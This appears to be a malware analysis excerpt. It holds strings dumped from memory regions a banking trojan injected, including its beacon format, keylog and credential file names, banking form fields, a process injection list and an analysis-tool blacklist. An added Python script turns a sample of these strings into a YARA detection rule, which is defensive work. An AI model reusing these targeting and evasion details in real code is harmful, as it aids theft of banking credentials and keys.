Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
LOCALSERVICE!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_824_rwx_006B0000_00056000:

svchost.exe_824_rwx_00ED0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
SYSTEM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_864_rwx_01A40000_00056000:

svchost.exe_864_rwx_026F0000_00065000:

taskhost.exe_872_rwx_00580000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin
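
The listing above is raw output of a string extractor run over the injected memory regions, so the artefacts a responder actually wants (named sync objects, persistence keys, the beacon format, the injection target list, the anti-analysis blacklist) sit between hundreds of ordinary DLL and API names. The script below is an added example, not part of the Lavasoft report, that sorts a constructed excerpt of the listing into those classes and emits a YARA rule from the high-specificity ones only. The classification heuristics, the reading of the wireshark/dumpcap/idag/C:\iDEFENSE strings as an analysis-tool check, and the rule name shiz_dump_strings are this example's assumptions; the sample strings are copied from the listing, with the defanged hXXp/VVV notation kept as the report prints it.

```python
"""Triage a 'strings from dump' listing into IOC classes and a YARA rule.

Added example (not code from the Lavasoft report): the heuristics below are
the author's assumptions about which string shapes carry detection value.
"""
import re
from collections import defaultdict

# Constructed excerpt of the dump listing above (not the full dump).
SAMPLE_DUMP = r"""
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\HighMemoryEvent_x
software\microsoft\windows\currentversion\run
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|firefox.exe|chrome.exe|svchost.exe|
wireshark.exe
dumpcap.exe
idag.exe
C:\iDEFENSE
C:\Windows\apppatch\xodaql.exe
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
LibVNCServer 0.9.7
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
kernel32.dll
HttpSendRequestA
CertVerifyCertificateChainPolicy
PFXExportCertStoreEx
"""

# Process names that sit next to 'C:\iDEFENSE' in the listing; reading them as
# an analysis-tool blacklist is this example's assumption, not the report's.
ANALYSIS_TOOLS = {
    "multi_pot.exe", "hookexplorer.exe", "proc_analyzer.exe", "scktool.exe",
    "sniff_hit.exe", "sysanalyzer.exe", "idag.exe", "dumpcap.exe", "wireshark.exe",
}

SYNC_RE = re.compile(r"^(Local|Global)\\")          # named mutex/event/section
REG_RE = re.compile(r"^(software|system)\\", re.I)  # registry path
URL_RE = re.compile(r"^hXXps?://", re.I)            # defanged URL
PATH_RE = re.compile(r"^[A-Za-z]:\\")               # absolute file path
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]{3,}$")      # bare Win32 export name


def refang(s):
    """Undo the hXXp:// and VVV. defanging used in the report."""
    return re.sub(r"^hXX", "htt", s).replace("VVV.", "www.")


def classify(line):
    """Map one extracted string to an IOC class (order matters)."""
    if SYNC_RE.match(line):
        return "sync_object"
    if REG_RE.match(line):
        return "registry"
    if URL_RE.match(line):
        return "url"
    if line.lower() in ANALYSIS_TOOLS or line == r"C:\iDEFENSE":
        return "anti_analysis"
    if PATH_RE.match(line):
        return "file_path"
    if line.count("|") >= 2 and ".exe" in line:
        return "inject_targets"
    if "=" in line and "&" in line:
        return "http_form"          # beacon or form-grabber template
    if line.lower().endswith(".dll"):
        return "library"
    if API_RE.match(line):
        return "api"
    return "other"


def triage(dump_text):
    """Group the strings of one dump section by class."""
    groups = defaultdict(list)
    for raw in dump_text.splitlines():
        line = raw.strip()
        if line:
            groups[classify(line)].append(line)
    return dict(groups)


def inject_targets(groups):
    """Split the pipe-delimited process list into individual image names."""
    names = []
    for entry in groups.get("inject_targets", []):
        names.extend(n for n in entry.split("|") if n)
    return names


def yara_rule(groups, name="shiz_dump_strings"):
    """Build a YARA rule from the high-specificity classes only.

    DLL and API names are deliberately excluded: they occur in every Win32
    program and would make the rule fire on clean binaries.
    """
    keep = ("sync_object", "http_form", "file_path", "anti_analysis")
    strings = [s.replace("\\", "\\\\").replace('"', '\\"')
               for cls in keep for s in groups.get(cls, [])]
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings, 1):
        lines.append(f'        $s{i} = "{s}" ascii wide')
    needed = max(1, min(3, len(strings)))
    lines += ["    condition:", f"        {needed} of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    g = triage(SAMPLE_DUMP)
    for cls, items in g.items():
        print(cls, "->", items)
    print("injection targets:", inject_targets(g))
    print(yara_rule(g))
```

The rule requires three of the kept strings to match, so a single shared GUID or a lone path is not enough on its own; the sync-object names are the strongest anchors because they are fixed across every injected process in this report, while the beacon template ties a sample to this bot version.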

taskhost.exe_872_rwx_007C0000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
